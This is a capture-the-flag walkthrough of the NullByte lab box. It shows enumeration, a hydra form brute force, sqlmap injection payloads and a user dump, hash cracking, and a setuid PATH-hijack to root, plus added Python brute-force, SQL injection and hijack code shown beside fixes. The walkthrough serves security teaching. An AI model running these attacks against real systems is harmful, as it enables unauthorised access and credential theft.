NullByte
Location
https://download.vulnhub.com/nullbyte/NullByte.ova.zip
Description
Objective: Get to /root/proof.txt and follow the instructions.
Level: Basic to intermediate.
Description: Boot2root, box will get IP from dhcp, works fine with virtualbox&vmware.
Hints: Use your lateral thinking skills, maybe you’ll need to write some code.
Enumeration
```
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.110.4

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-09-08 11:49 CEST
Nmap scan report for 192.168.110.4
Host is up (0.00064s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          43405/udp  status
|_  100024  1          53410/tcp  status
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
|   2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|_  256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
53410/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.17 seconds
```
Let’s start with port 80.
```
┌─[n13mant@planetmars]─[~]
└──╼ $curl -v http://192.168.110.4/
*   Trying 192.168.110.4...
* Connected to 192.168.110.4 (192.168.110.4) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.110.4
> User-Agent: curl/7.50.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Thu, 08 Sep 2016 11:52:05 GMT
< Server: Apache/2.4.10 (Debian)
< Last-Modified: Sat, 01 Aug 2015 16:44:18 GMT
< ETag: "c4-51c42a5c32a70"
< Accept-Ranges: bytes
< Content-Length: 196
< Vary: Accept-Encoding
< Content-Type: text/html
<
<html>
<head><title>Null Byte 00 - level 1</title></head>
<body>
<center>
<img src="main.gif">
<p>
If you search for the laws of harmony, you will find knowledge.
</p>
</center>
</body>
</html>
* Connection #0 to host 192.168.110.4 left intact
```
```
┌─[n13mant@planetmars]─[~]
└──╼ $dirb http://192.168.110.4/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Sep  8 11:53:59 2016
URL_BASE: http://192.168.110.4/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.110.4/ ----
+ http://192.168.110.4/index.html (CODE:200|SIZE:196)
==> DIRECTORY: http://192.168.110.4/javascript/
==> DIRECTORY: http://192.168.110.4/phpmyadmin/
+ http://192.168.110.4/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.110.4/uploads/
-----SNIP-----
```
Next I downloaded main.gif and examined it with exiftool. Its Comment field held a password-like string: "P-): kzMb5nVYJw". Was it a password for phpMyAdmin or something else? A simple try was to append it to the URL as a directory name, and the result was satisfying.
```
┌─[n13mant@planetmars]─[~]
└──╼ $curl http://192.168.110.4/kzMb5nVYJw/
<center>
<form method="post" action="index.php">
Key:<br>
<input type="password" name="key">
</form>
</center>
<!-- this form isn't connected to mysql, password ain't that complex --!>
```
The password is not that complex, but after a few tries I decided to let hydra do this tiresome job. The http-form-post module spec has three colon-separated fields: the path, the POST body with ^PASS^ standing in for each guess, and the string that marks a failed attempt ("invalid key"); the first response that does not contain it is reported as the hit.
```
┌─[n13mant@planetmars]─[~]
└──╼ $hydra -f 192.168.110.4 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l "" -P /usr/share/wordlists/english_words/words.dic
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
-----SNIP-----
[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: 192.168.110.4   password: elite
1 of 1 target successfully completed, 1 valid password found
```
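The same attack written by hand, as an added example that is not part of the original post (the box's hint did say you might need to write some code). The URL, the key field and the "invalid key" failure marker come from the hydra command above; the HTTP transport is a parameter so the logic can be exercised offline against fake_target, a constructed stand-in for index.php that answers like the real form.

```python
# Added example: hydra's http-post-form logic by hand. A guess is a hit when the
# failure marker is absent from the response (both outcomes return HTTP 200 on
# a form like this, so the status code is useless). fake_target is constructed.
import urllib.parse
import urllib.request

FAIL_MARKER = "invalid key"


def http_post(url, fields, timeout=5):
    """Minimal form POST with the stdlib; returns the response body as text."""
    body = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(url, data=body, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def is_hit(body, fail_marker=FAIL_MARKER):
    """Hydra's default rule: success is the absence of the failure string."""
    return fail_marker not in body


def brute_force_key(url, candidates, post=http_post, fail_marker=FAIL_MARKER):
    """Try each candidate in order; return (key, attempts) on the first hit,
    or (None, attempts) when the list is exhausted (hydra -f behaviour)."""
    attempts = 0
    for guess in candidates:
        guess = guess.rstrip("\r\n")      # wordlist lines
        if not guess:
            continue
        attempts += 1
        body = post(url, {"key": guess})
        if is_hit(body, fail_marker):
            return guess, attempts
    return None, attempts


def fake_target(url, fields):
    """Constructed stand-in for /kzMb5nVYJw/index.php so the example runs offline."""
    if fields.get("key") == "elite":
        return "<p>Search for usernames: </p>"
    return "invalid key"


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:   # real run: python3 keybrute.py <form url> <wordlist>
        with open(sys.argv[2], errors="replace") as wordlist:
            print(brute_force_key(sys.argv[1], wordlist))
    else:                    # offline demo against the constructed stand-in
        demo_words = ["admin", "password", "elite", "omega"]
        print(brute_force_key("http://example.invalid/", demo_words, post=fake_target))
```

One check worth adding on a real target: fetch the form once with a guess you know is wrong and confirm the failure marker is actually present, otherwise an error page or a rate-limit response will be mistaken for a hit.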
```
┌─[n13mant@planetmars]─[~]
└──╼ $curl -X POST -F 'key=elite' http://192.168.110.4/kzMb5nVYJw/index.php
<p>Search for usernames: </p>
<hr>
<form action="420search.php" method="get">
Enter username:<br>
<input type="text" name="usrtosearch">
</form>
```
```
┌─[n13mant@planetmars]─[~]
└──╼ $curl -X POST -F 'key=elite' http://192.168.110.4/kzMb5nVYJw/420search.php
EMP ID :1 <br> EMP NAME : ramses <br> EMP POSITION :  <br> --------------------------------<br>EMP ID :2 <br> EMP NAME : isis <br> EMP POSITION : employee <br> --------------------------------<br>Fetched data successfully
```
A database. First some manual tries, but after a while I decided to put my faith in sqlmap. The trailing * in the URL tells sqlmap exactly where to inject.
```
┌─[n13mant@planetmars]─[~]
└──╼ $sqlmap -u "http://192.168.110.4/kzMb5nVYJw/420search.php?usrtosearch=isis*" --dbs
         _
 ___ ___| |_____ ___ ___  {1.0.8.2#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:20:24
-----SNIP-----
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" AND 8757=8757#

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162787671,(SELECT (ELT(6320=6320,1))),0x717a767a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- PfDF

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" AND SLEEP(5)-- IEfZ

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" UNION ALL SELECT CONCAT(0x7162787671,0x4772734e5241706d774a6f734c53427a57414870547246534a69794b454d447665754461756c7778,0x717a767a71),NULL,NULL#
---
[13:20:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[13:20:51] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
```
```
┌─[n13mant@planetmars]─[~]
└──╼ $sqlmap -u "http://192.168.110.4/kzMb5nVYJw/420search.php?usrtosearch=isis*" --dbms=mysql -D seth --tables
-----SNIP-----
[13:24:00] [INFO] fetching tables for database: 'seth'
Database: seth
[1 table]
+-------+
| users |
+-------+

┌─[n13mant@planetmars]─[~]
└──╼ $sqlmap -u "http://192.168.110.4/kzMb5nVYJw/420search.php?usrtosearch=isis*" --dbms=mysql -D seth -T users --dump
-----SNIP-----
[13:24:14] [INFO] fetching columns for table 'users' in database 'seth'
[13:24:14] [INFO] fetching entries for table 'users' in database 'seth'
[13:24:14] [INFO] analyzing table dump for possible password hashes
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass                                        | user   | position   |
+----+---------------------------------------------+--------+------------+
| 1  | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank>    |
| 2  | --not allowed--                             | isis   | employee   |
+----+---------------------------------------------+--------+------------+
```
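sqlmap's findings above say everything needed to do this by hand: the input lands inside a double-quoted string, a # comment discards the rest of the query, and the query has three columns. The following is an added example, not the box's code: a stand-in for 420search.php that reproduces the bug class, next to the parameterised fix, plus a boolean-blind extractor built on the same injection point. It runs on SQLite rather than MySQL, so string literals use single quotes and comments use "-- " (the MySQL form of each payload is noted in a comment). The table rows are the two from the seth.users dump; the assumed original query shape (SELECT id, user, position ... WHERE user LIKE '%...%') is an inference from the page output.

```python
# Added example: string-concatenated query (vulnerable) beside a parameterised
# one (fixed), with UNION and boolean-blind extraction against the former.
# SQLite stand-in for the MySQL back end; rows are from the seth.users dump.
import sqlite3
import string

USERS = [
    (1, "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE", "ramses", ""),
    (2, "--not allowed--", "isis", "employee"),
]
B64_ALPHABET = string.ascii_letters + string.digits + "+/="


def make_db():
    """In-memory copy of the seth database (constructed for the demo)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, pass TEXT, user TEXT, position TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return db


def search_vulnerable(db, usrtosearch):
    """The bug class behind 420search.php: user input pasted into the SQL text."""
    sql = "SELECT id, user, position FROM users WHERE user LIKE '%" + usrtosearch + "%'"
    return db.execute(sql).fetchall()


def search_fixed(db, usrtosearch):
    """Same query with the value bound as a parameter: it can no longer change the SQL."""
    sql = "SELECT id, user, position FROM users WHERE user LIKE ?"
    return db.execute(sql, ("%" + usrtosearch + "%",)).fetchall()


# SQLite translation of sqlmap's "MySQL UNION query (NULL) - 3 columns" finding.
# Against the real target (double-quoted strings, '#' comments) it reads:
#   isis" UNION ALL SELECT user,pass,position FROM users#
UNION_PAYLOAD = "nobody' UNION ALL SELECT user, pass, position FROM users-- "


def oracle(db, condition):
    """Boolean-blind primitive: does the isis row still come back with `condition` ANDed in?
    (sqlmap's 'isis" AND 8757=8757#' is exactly this with a tautology.)"""
    return len(search_vulnerable(db, "isis' AND (" + condition + ")-- ")) > 0


def blind_extract(db, scalar_subquery, alphabet=B64_ALPHABET, max_len=64):
    """Recover a string one character at a time using only true/false answers.
    On MySQL compare with BINARY, since its default collation is case-insensitive."""
    out = ""
    for i in range(1, max_len + 1):
        for ch in alphabet:
            if oracle(db, "substr((%s), %d, 1) = '%s'" % (scalar_subquery, i, ch)):
                out += ch
                break
        else:
            break          # no character matched: end of string
    return out


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, UNION_PAYLOAD))
    print("fixed:     ", search_fixed(db, UNION_PAYLOAD))
    print("blind:     ", blind_extract(db, "SELECT pass FROM users WHERE user = 'ramses'"))
```

The fixed version returns nothing for the UNION payload because the whole string is matched as a (non-existent) username; the vulnerable one returns every user's pass column, which is what sqlmap's --dump did with its CONCAT-in-column-1 payload. The blind path is the fallback when output is not reflected at all, at the cost of roughly one request per candidate character.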
I guess the isis user will be the goal to elevate to once inside the machine. The string from ramses looks like base64 to me: 43 characters, so the trailing = padding has been stripped and has to be put back before decoding.
```
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=' | base64 -d
c6d6bd7ebf806f43c76acc3681703b81
```
And that (32 hex characters) looks like an MD5 hash.
```
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $findmyhash MD5 -h c6d6bd7ebf806f43c76acc3681703b81
-----SNIP-----
The following hashes were cracked:
----------------------------------
c6d6bd7ebf806f43c76acc3681703b81 -> omega
```
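findmyhash asks online lookup services, which is not always an option on an engagement. The following is an added example, not from the original post, that does the two steps above offline: repair the stripped base64 padding, identify the digest type from its length, and run a dictionary attack with hashlib. The wordlist in the demo run is constructed; the stored value and the decoded digest are the ones from the page.

```python
# Added example: stripped-base64 -> hex digest -> offline dictionary attack.
# Only the stored value and its decoded digest come from the page; the
# wordlist is constructed.
import base64
import hashlib
import re

HEX_DIGEST_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}


def b64decode_lenient(value):
    """base64-decode a value whose trailing '=' padding may have been stripped
    (a 43-character value needs one '=' to reach a multiple of four)."""
    value = value.strip()
    return base64.b64decode(value + "=" * (-len(value) % 4))


def guess_digest_type(text):
    """Name the hash function whose hex digest has this length, or None."""
    if not re.fullmatch(r"[0-9a-fA-F]+", text):
        return None
    return HEX_DIGEST_LENGTHS.get(len(text))


def crack_hex_digest(target_hex, candidates, algorithm=None):
    """Hash each candidate with `algorithm` (guessed from the length if omitted)
    until one matches; return the plaintext or None."""
    algorithm = algorithm or guess_digest_type(target_hex)
    if algorithm is None:
        raise ValueError("cannot infer hash type from %r" % target_hex)
    target_hex = target_hex.lower()
    for word in candidates:
        word = word.rstrip("\r\n")          # wordlist lines
        if hashlib.new(algorithm, word.encode("utf-8")).hexdigest() == target_hex:
            return word
    return None


def recover_password(stored_value, candidates):
    """End to end: stripped base64 -> hex digest -> dictionary attack."""
    digest = b64decode_lenient(stored_value).decode("ascii")
    return digest, crack_hex_digest(digest, candidates)


if __name__ == "__main__":
    demo_words = ["alpha", "beta", "password", "omega"]     # constructed mini wordlist
    print(recover_password("YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE", demo_words))
```

Length alone cannot distinguish MD5 from, say, a truncated SHA-1 or an NTLM hash, so when the guessed type yields nothing the next step is to retry with the other candidates for that length rather than a bigger wordlist.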
Let's see if this grants some access to the server. SSH is on port 777, per the nmap scan.
```
┌─[n13mant@planetmars]─[~]
└──╼ $ssh ramses@192.168.110.4 -p 777
ramses@192.168.110.4's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug  2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$
```
```
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$ sudo -l
[sudo] password for ramses:
Sorry, user ramses may not run sudo on NullByte.
ramses@NullByte:/home$ ls -lah
total 20K
drwxr-xr-x  5 root   root   4.0K Aug  2  2015 .
drwxr-xr-x 21 root   root   4.0K Aug  1  2015 ..
drwxr-xr-x  2 bob    bob    4.0K Aug  2  2015 bob
drwxr-xr-x  2 eric   eric   4.0K Aug  2  2015 eric
drwxr-xr-x  2 ramses ramses 4.0K Aug  2  2015 ramses
```
bob and eric? Not the kind of names I would have expected.
```
ramses@NullByte:/home$ ls -aRl bob
bob:
total 20
drwxr-xr-x 2 bob  bob  4096 Aug  2  2015 .
drwxr-xr-x 5 root root 4096 Aug  2  2015 ..
-rw-r--r-- 1 bob  bob   220 Aug  2  2015 .bash_logout
-rw-r--r-- 1 bob  bob  3515 Aug  2  2015 .bashrc
-rw-r--r-- 1 bob  bob   675 Aug  2  2015 .profile
ramses@NullByte:/home$ ls -aRl eric
eric:
total 24
drwxr-xr-x 2 eric eric 4096 Aug  2  2015 .
drwxr-xr-x 5 root root 4096 Aug  2  2015 ..
-rw------- 1 eric eric  545 Aug  2  2015 .bash_history
-rw-r--r-- 1 eric eric  220 Aug  2  2015 .bash_logout
-rw-r--r-- 1 eric eric 3515 Aug  2  2015 .bashrc
-rw-r--r-- 1 eric eric  675 Aug  2  2015 .profile
ramses@NullByte:/home$ ls -aRl ramses
ramses:
total 24
drwxr-xr-x 2 ramses ramses 4096 Aug  2  2015 .
drwxr-xr-x 5 root   root   4096 Aug  2  2015 ..
-rw------- 1 ramses ramses   96 Aug  2  2015 .bash_history
-rw-r--r-- 1 ramses ramses  220 Aug  2  2015 .bash_logout
-rw-r--r-- 1 ramses ramses 3515 Aug  2  2015 .bashrc
-rw-r--r-- 1 ramses ramses  675 Aug  2  2015 .profile
ramses@NullByte:/home$ cat /home/ramses/.bash_history
sudo -s
su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch
clear
sudo -s
cd /
ls
exit
```
A backup folder in /var/www, and a procwatch binary that was run from there.
```
ramses@NullByte:/home$ cd /var/www/
ramses@NullByte:/var/www$ ls -lah
total 16K
drwxr-xr-x  4 root root 4.0K Aug  2  2015 .
drwxr-xr-x 12 root root 4.0K Aug  2  2015 ..
drwxrwxrwx  2 root root 4.0K Aug  2  2015 backup
drwxr-xr-x  4 root root 4.0K Aug  2  2015 html
ramses@NullByte:/var/www$ cd backup
ramses@NullByte:/var/www/backup$ ls -lh
total 12K
-rwsr-xr-x 1 root root 4.9K Aug  2  2015 procwatch
-rw-r--r-- 1 root root   28 Aug  2  2015 readme.txt
ramses@NullByte:/var/www/backup$ ls -lah
total 20K
drwxrwxrwx 2 root root 4.0K Aug  2  2015 .
drwxr-xr-x 4 root root 4.0K Aug  2  2015 ..
-rwsr-xr-x 1 root root 4.9K Aug  2  2015 procwatch
-rw-r--r-- 1 root root   28 Aug  2  2015 readme.txt
ramses@NullByte:/var/www/backup$ cat readme.txt
I have to fix this mess...
```
What mess? Note the permissions: procwatch is setuid root (the s in -rwsr-xr-x) and sits in a world-writable directory.
```
ramses@NullByte:/var/www/backup$ ./procwatch
  PID TTY          TIME CMD
 1679 pts/0    00:00:00 procwatch
 1680 pts/0    00:00:00 sh
 1681 pts/0    00:00:00 ps
```
The process list shows procwatch spawning sh, which in turn runs ps: the binary hands a bare ps command to the shell (a system()-style call), so the shell resolves it through PATH rather than an absolute path. Since procwatch is setuid root, whichever ps the shell finds first runs with effective uid 0.
```
ramses@NullByte:/var/www/backup$ ln -snf /bin/sh ps
ramses@NullByte:/var/www/backup$ export PATH=`pwd`:${PATH}
```
I made a symbolic link to /bin/sh named ps, then prepended the current directory to PATH so that the shell spawned by procwatch finds my ps before /bin/ps. One caveat: this works because /bin/sh on Debian 8 is dash, which keeps a raised effective uid; had it been bash, the shell would have dropped euid 0 on startup unless invoked with -p.
Now it's time to run procwatch again.
```
ramses@NullByte:/var/www/backup$ ./procwatch
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
```
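The hijack above, reproduced as an added example that is not part of the original post and does not need a setuid binary: a stand-in victim does what procwatch's process tree suggests it does (sh -c 'ps'), once with the caller's PATH and once the way a privileged program should do it. The fake ps prints a marker instead of spawning a shell, and everything happens in a throwaway directory. That procwatch uses a system()-style call is an inference from the ps output on the page, not something the page confirms.

```python
# Added example: PATH hijack of a program that runs a bare command through the
# shell, next to the hardened form (absolute path, environment not inherited).
# The setuid bit is left out so the demo is safe to run anywhere.
import os
import stat
import subprocess
import tempfile

FAKE_PS = "#!/bin/sh\necho HIJACKED\n"   # stand-in for `ln -snf /bin/sh ps`


def plant_fake_ps(directory):
    """Attacker's move: drop an executable called ps into a directory they control."""
    path = os.path.join(directory, "ps")
    with open(path, "w") as fh:
        fh.write(FAKE_PS)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)
    return path


def victim_unsafe(inherited_env):
    """Models procwatch: a shell runs the bare command 'ps', resolved via the caller's PATH."""
    proc = subprocess.run(["/bin/sh", "-c", "ps"], env=inherited_env,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def victim_safe():
    """Hardened: the caller's environment is discarded, PATH is fixed and the
    command is given by absolute path, so nothing the caller controls is consulted."""
    clean_env = {"PATH": "/usr/bin:/bin"}
    proc = subprocess.run(["/bin/sh", "-c", "/bin/ps"], env=clean_env,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def run_demo():
    """Return (unsafe_output, safe_output) for one hijack attempt in a temp directory."""
    with tempfile.TemporaryDirectory() as tmp:
        plant_fake_ps(tmp)
        # What `export PATH=$(pwd):$PATH` did on the box.
        hijacked_path = tmp + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")
        inherited = dict(os.environ, PATH=hijacked_path)
        return victim_unsafe(inherited), victim_safe()


if __name__ == "__main__":
    unsafe, safe = run_demo()
    print("PATH-resolved ps  :", unsafe)
    print("/bin/ps, clean env:", safe.splitlines()[0] if safe else "(ps not available)")
```

The dynamic loader strips LD_PRELOAD and LD_LIBRARY_PATH for setuid executables, but PATH is not touched, so a setuid program that calls system() or execvp() with a relative command is hijackable by anyone who can write a directory and set an environment variable. The fix is execve() with an absolute path and a sanitized environment, or simply not running ps with elevated privileges at all, since ps needs none.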
```
# cd /root
# ls
proof.txt
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you.
Write a walk & mail at

xly0n@sigaint.org
attach the walk and proof.txt

If sigaint.org is down you may mail at nbsly0n@gmail.com


USE THIS PGP PUBLIC KEY

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0

mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----
```
Conclusion
This was a cool challenge. I had fun and learned new stuff.
Thanks to ly0n for making this one available.